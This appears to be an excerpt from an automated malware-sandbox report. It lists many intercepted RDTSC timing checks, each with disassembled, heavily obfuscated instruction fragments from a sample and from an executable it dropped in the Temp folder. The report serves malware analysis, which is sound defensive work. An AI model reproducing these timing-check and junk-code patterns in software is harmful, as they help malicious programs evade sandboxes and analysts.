          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370574 second address: 537058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D282h 0x00000007 mov ecx, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F296427ABh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537058E second address: 5370594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370594 second address: 5370598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370598 second address: 537059C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370618 second address: 5370637 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4F296427AEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370637 second address: 537063B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537063B second address: 537065D instructions: 0x00000000 rdtsc 0x00000002 mov edi, 1FE150BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F296427B3h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537065D second address: 537067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537067A second address: 537068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F296427ACh 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 81DBFC second address: 81DC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 998811 second address: 99883D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B3h 0x00000007 je 00007F4F296427A8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F4F296427C9h 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CBCA second address: 99CBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F4F28CDCB6Fh 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CBEC second address: 99CBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CBF5 second address: 99CC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CC05 second address: 99CC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CC09 second address: 99CC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4F28CDCB6Ch 0x0000000c je 00007F4F28CDCB66h 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 jno 00007F4F28CDCB70h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CC37 second address: 99CC3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CC3B second address: 81DBFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D1E58h], edx 0x0000000e push dword ptr [ebp+122D0701h] 0x00000014 mov edx, dword ptr [ebp+122D1E58h] 0x0000001a call dword ptr [ebp+122D1E52h] 0x00000020 pushad 0x00000021 cld 0x00000022 xor eax, eax 0x00000024 jp 00007F4F28CDCB6Ch 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e pushad 0x0000002f mov ecx, edi 0x00000031 mov edx, 5C868A00h 0x00000036 popad 0x00000037 mov dword ptr [ebp+122D2ADAh], eax 0x0000003d jmp 00007F4F28CDCB6Eh 0x00000042 sub dword ptr [ebp+122D1DD7h], ecx 0x00000048 mov esi, 0000003Ch 0x0000004d pushad 0x0000004e mov esi, 0339D0F4h 0x00000053 mov dword ptr [ebp+122D1D66h], esi 0x00000059 popad 0x0000005a add dword ptr [ebp+122D1DD7h], ebx 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 mov si, A7E0h 0x00000069 mov edx, dword ptr [ebp+122D2BFAh] 0x0000006f popad 0x00000070 jo 00007F4F28CDCB76h 0x00000076 jmp 00007F4F28CDCB70h 0x0000007b lodsw 0x0000007d clc 0x0000007e add eax, dword ptr [esp+24h] 0x00000082 je 00007F4F28CDCB74h 0x00000088 jmp 00007F4F28CDCB6Eh 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 cld 0x00000092 nop 0x00000093 push eax 0x00000094 push eax 0x00000095 push edx 0x00000096 push eax 0x00000097 push edx 0x00000098 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CCEA second address: 99CD05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F4F296427A6h 0x00000015 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CD05 second address: 99CD0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CD0B second address: 99CD66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007F4F296427A6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push edx 0x00000011 jmp 00007F4F296427B4h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 movzx edx, ax 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f jne 00007F4F296427A9h 0x00000025 push 00000003h 0x00000027 jo 00007F4F296427ABh 0x0000002d mov edi, 3606B538h 0x00000032 push A419219Ah 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a jmp 00007F4F296427AEh 0x0000003f pop eax 0x00000040 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CD66 second address: 99CD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CE5F second address: 99CE63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CE63 second address: 99CE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CE69 second address: 99CE85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4F296427A8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F4F296427ABh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CE85 second address: 99CE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CE8B second address: 99CEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jno 00007F4F296427B4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push esi 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CEBA second address: 99CF82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4F28CDCB6Dh 0x0000000e popad 0x0000000f pop eax 0x00000010 mov ecx, edx 0x00000012 push 00000003h 0x00000014 mov dh, 3Fh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4F28CDCB68h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 pushad 0x00000033 adc dh, FFFFFFABh 0x00000036 sub bl, FFFFFFF3h 0x00000039 popad 0x0000003a push 00000003h 0x0000003c mov edi, dword ptr [ebp+122D2AE6h] 0x00000042 push E34163E6h 0x00000047 jmp 00007F4F28CDCB6Bh 0x0000004c xor dword ptr [esp], 234163E6h 0x00000053 and ecx, 47779AD1h 0x00000059 lea ebx, dword ptr [ebp+12452B15h] 0x0000005f mov dword ptr [ebp+122D206Ch], eax 0x00000065 xor edi, dword ptr [ebp+122D2B6Eh] 0x0000006b xchg eax, ebx 0x0000006c pushad 0x0000006d jmp 00007F4F28CDCB79h 0x00000072 jmp 00007F4F28CDCB6Eh 0x00000077 popad 0x00000078 push eax 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F4F28CDCB76h 0x00000080 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CF82 second address: 99CF8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4F296427A6h 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CFEF second address: 99CFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99CFF3 second address: 99D033 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov edi, ebx 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4F296427A8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push A5CA6EC9h 0x0000002b push eax 0x0000002c push edx 0x0000002d jnc 00007F4F296427ACh 0x00000033 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99D033 second address: 99D0B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5A3591B7h 0x00000010 call 00007F4F28CDCB6Ah 0x00000015 call 00007F4F28CDCB74h 0x0000001a xor dword ptr [ebp+122D1DCFh], esi 0x00000020 pop esi 0x00000021 pop edx 0x00000022 push 00000003h 0x00000024 mov cx, FC5Eh 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b mov si, cx 0x0000002e pop edi 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F4F28CDCB68h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b jnl 00007F4F28CDCB68h 0x00000051 push CE50BBEAh 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99D0B1 second address: 99D0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 99D0B5 second address: 99D0BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4F28CDCB66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD953 second address: 9BD959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD959 second address: 9BD960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BB7CE second address: 9BB7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F4F296427A6h 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BB7DA second address: 9BB7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BB919 second address: 9BB927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BBA68 second address: 9BBA7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BBFEF second address: 9BBFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4F296427A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BBFFE second address: 9BC002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BC152 second address: 9BC158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BC276 second address: 9BC27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BC27A second address: 9BC284 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F296427A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BC284 second address: 9BC28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BC704 second address: 9BC709 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9B002E second address: 9B0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCF83 second address: 9BCF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCF87 second address: 9BCF8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCF8D second address: 9BCF96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCF96 second address: 9BCF9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCF9C second address: 9BCFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCFA3 second address: 9BCFAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4F28CDCB66h 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCFAF second address: 9BCFE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4F296427AAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4F296427B4h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4F296427B0h 0x0000001a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BCFE8 second address: 9BD017 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Eh 0x00000007 jmp 00007F4F28CDCB79h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD017 second address: 9BD01B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD18B second address: 9BD199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD199 second address: 9BD19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD19F second address: 9BD1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD1A5 second address: 9BD1AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD31B second address: 9BD33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB76h 0x00000007 jo 00007F4F28CDCB66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD798 second address: 9BD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F4F296427A6h 0x0000000e pop ecx 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9BD7A7 second address: 9BD7B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C1818 second address: 9C182F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F296427B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C37AE second address: 9C37D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4F28CDCB6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C37D5 second address: 9C37D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C9048 second address: 9C9052 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F28CDCB6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C8468 second address: 9C849B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F4F296427AAh 0x00000010 ja 00007F4F296427A6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4F296427B5h 0x0000001e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C849B second address: 9C849F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C849F second address: 9C84AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4F296427A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C85FC second address: 9C8619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F28CDCB79h 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C876A second address: 9C8770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C88B1 second address: 9C88C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F28CDCB6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\7V52BG1QZHX6WU0LEYA.exeRDTSC instruction interceptor: First address: 9C88C7 second address: 9C88D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4F296427A6h 0x0000000a pop eax 0x0000000b rdtsc
